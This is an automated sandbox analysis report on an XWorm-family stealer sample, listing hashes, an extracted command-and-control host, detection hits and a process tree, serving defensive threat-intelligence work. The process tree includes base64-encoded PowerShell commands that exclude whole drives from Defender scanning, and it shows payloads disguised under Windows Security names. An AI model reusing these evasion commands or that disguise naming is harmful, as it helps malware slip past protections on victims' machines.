Analysis

max time kernel: 121s
max time network: 122s
platform: windows7_x64
resource: win7-20241023-en
resource tags: arch:x64, arch:x86, image:win7-20241023-en, locale:en-us, os:windows7-x64, system
submitted: 08/11/2024, 20:48
Static task: static1

Behavioral task: behavioral1
  Sample: TalibanStealerInstaller.exe
  Resource: win7-20241023-en

Behavioral task: behavioral2
  Sample: TalibanStealerInstaller.exe
  Resource: win10v2004-20241007-en
General

Target: TalibanStealerInstaller.exe
Size: 4.1MB
MD5: 7531fbb7431039bda2b19160e0b9c2d4
SHA1: b7f4a971ebf8128ee1ea7cb764b9582fb73b8002
SHA256: 6a93c6b6467f2e24918f9c39f2b0d91a14974b3af096d39dda126c02f3299bc8
SHA512: 5b8b09d896e12f3da879939f3c925da58ba79c6c1f2559594b1eb11d8fd5f63d3afeb12484b8656e0ba929cb0bb7fbb67a566d3599769c955885ca21b4036487
SSDEEP: 98304:51mCYY8UGo4x83fa1lyrd3qNz6VTDwgiLC/sE1:nmCWUUqi1s530+VohE
Malware Config

Extracted: xworm
lijaligibidu-35558.portmap.host:35558
Install_directory: %AppData%
install_file: Windows Security.exe
Signatures

Detect Xworm Payload (2 IoCs)
resource | yara_rule
behavioral1/files/0x0008000000015cd1-10.dat | family_xworm
behavioral1/memory/2976-12-0x0000000000850000-0x0000000000868000-memory.dmp | family_xworm

Xworm family

Executes dropped EXE (5 IoCs)
pid | Process
2820 | TalibanStealerInstaller.exe
2976 | WindowsSecurity.exe
2688 | Windows Security.exe
300 | c9IDU7463.exe
1480 | TalibanStealerInstaller.exe

Loads dropped DLL (4 IoCs)
pid | Process
2820 | TalibanStealerInstaller.exe
2688 | Windows Security.exe
2820 | TalibanStealerInstaller.exe
2820 | TalibanStealerInstaller.exe

Looks up external IP address via web service (1 IoC)
Uses a legitimate IP lookup service to find the infected system's external IP.
flow | ioc
5 | ip-api.com

Obfuscated Files or Information: Command Obfuscation (1 TTP)
Adversaries may obfuscate content during command execution to impede detection.

Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s).
System Location Discovery: System Language Discovery (1 TTP, 4 IoCs)
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
description | ioc | Process
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | powershell.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | TalibanStealerInstaller.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | powershell.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | Windows Security.exe
Enumerates system info in registry (2 TTPs, 3 IoCs)
description | ioc | Process
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | TalibanStealerInstaller.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | TalibanStealerInstaller.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemVersion | TalibanStealerInstaller.exe

Suspicious behavior: EnumeratesProcesses (2 IoCs)
pid | Process
2408 | powershell.exe
2404 | powershell.exe

Suspicious use of AdjustPrivilegeToken (4 IoCs)
description | pid | Process
Token: SeDebugPrivilege | 2976 | WindowsSecurity.exe
Token: SeDebugPrivilege | 300 | c9IDU7463.exe
Token: SeDebugPrivilege | 2408 | powershell.exe
Token: SeDebugPrivilege | 2404 | powershell.exe

Suspicious use of WriteProcessMemory (30 IoCs)
description | pid | Process | procid_target
PID 2816 wrote to memory of 2820 | 2816 | TalibanStealerInstaller.exe | 30
PID 2816 wrote to memory of 2820 | 2816 | TalibanStealerInstaller.exe | 30
PID 2816 wrote to memory of 2820 | 2816 | TalibanStealerInstaller.exe | 30
PID 2816 wrote to memory of 2820 | 2816 | TalibanStealerInstaller.exe | 30
PID 2816 wrote to memory of 2820 | 2816 | TalibanStealerInstaller.exe | 30
PID 2816 wrote to memory of 2820 | 2816 | TalibanStealerInstaller.exe | 30
PID 2816 wrote to memory of 2820 | 2816 | TalibanStealerInstaller.exe | 30
PID 2816 wrote to memory of 2976 | 2816 | TalibanStealerInstaller.exe | 31
PID 2816 wrote to memory of 2976 | 2816 | TalibanStealerInstaller.exe | 31
PID 2816 wrote to memory of 2976 | 2816 | TalibanStealerInstaller.exe | 31
PID 2820 wrote to memory of 2408 | 2820 | TalibanStealerInstaller.exe | 32
PID 2820 wrote to memory of 2408 | 2820 | TalibanStealerInstaller.exe | 32
PID 2820 wrote to memory of 2408 | 2820 | TalibanStealerInstaller.exe | 32
PID 2820 wrote to memory of 2408 | 2820 | TalibanStealerInstaller.exe | 32
PID 2820 wrote to memory of 2688 | 2820 | TalibanStealerInstaller.exe | 34
PID 2820 wrote to memory of 2688 | 2820 | TalibanStealerInstaller.exe | 34
PID 2820 wrote to memory of 2688 | 2820 | TalibanStealerInstaller.exe | 34
PID 2820 wrote to memory of 2688 | 2820 | TalibanStealerInstaller.exe | 34
PID 2688 wrote to memory of 2404 | 2688 | Windows Security.exe | 35
PID 2688 wrote to memory of 2404 | 2688 | Windows Security.exe | 35
PID 2688 wrote to memory of 2404 | 2688 | Windows Security.exe | 35
PID 2688 wrote to memory of 2404 | 2688 | Windows Security.exe | 35
PID 2688 wrote to memory of 300 | 2688 | Windows Security.exe | 37
PID 2688 wrote to memory of 300 | 2688 | Windows Security.exe | 37
PID 2688 wrote to memory of 300 | 2688 | Windows Security.exe | 37
PID 2688 wrote to memory of 300 | 2688 | Windows Security.exe | 37
PID 2820 wrote to memory of 1480 | 2820 | TalibanStealerInstaller.exe | 38
PID 2820 wrote to memory of 1480 | 2820 | TalibanStealerInstaller.exe | 38
PID 2820 wrote to memory of 1480 | 2820 | TalibanStealerInstaller.exe | 38
PID 2820 wrote to memory of 1480 | 2820 | TalibanStealerInstaller.exe | 38
Processes

Level 1: C:\Users\Admin\AppData\Local\Temp\TalibanStealerInstaller.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\TalibanStealerInstaller.exe"
  PID: 2816
  - Suspicious use of WriteProcessMemory

  Level 2: C:\Users\Admin\AppData\Roaming\TalibanStealerInstaller.exe
    Command line: "C:\Users\Admin\AppData\Roaming\TalibanStealerInstaller.exe"
    PID: 2820
    - Executes dropped EXE
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory

    Level 3: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGkAdAByACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHoAYwBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAdwBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGsAdgBjACMAPgA="
      PID: 2408
      - System Location Discovery: System Language Discovery
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken

    Level 3: C:\Users\Admin\AppData\Local\Temp\Windows Security.exe
      Command line: "C:\Users\Admin\AppData\Local\Temp\Windows Security.exe"
      PID: 2688
      - Executes dropped EXE
      - Loads dropped DLL
      - System Location Discovery: System Language Discovery
      - Suspicious use of WriteProcessMemory

      Level 4: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHcAbQBrACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHEAYwB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAZgBmACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAdwBiACMAPgA="
        PID: 2404
        - System Location Discovery: System Language Discovery
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken

      Level 4: C:\Users\Admin\AppData\Local\Temp\c9IDU7463.exe
        Command line: "C:\Users\Admin\AppData\Local\Temp\c9IDU7463.exe"
        PID: 300
        - Executes dropped EXE
        - Suspicious use of AdjustPrivilegeToken

    Level 3: C:\Users\Admin\AppData\Local\Temp\TalibanStealerInstaller.exe
      Command line: "C:\Users\Admin\AppData\Local\Temp\TalibanStealerInstaller.exe"
      PID: 1480
      - Executes dropped EXE
      - Enumerates system info in registry

  Level 2: C:\Users\Admin\AppData\Roaming\WindowsSecurity.exe
    Command line: "C:\Users\Admin\AppData\Roaming\WindowsSecurity.exe"
    PID: 2976
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Enterprise v15
Downloads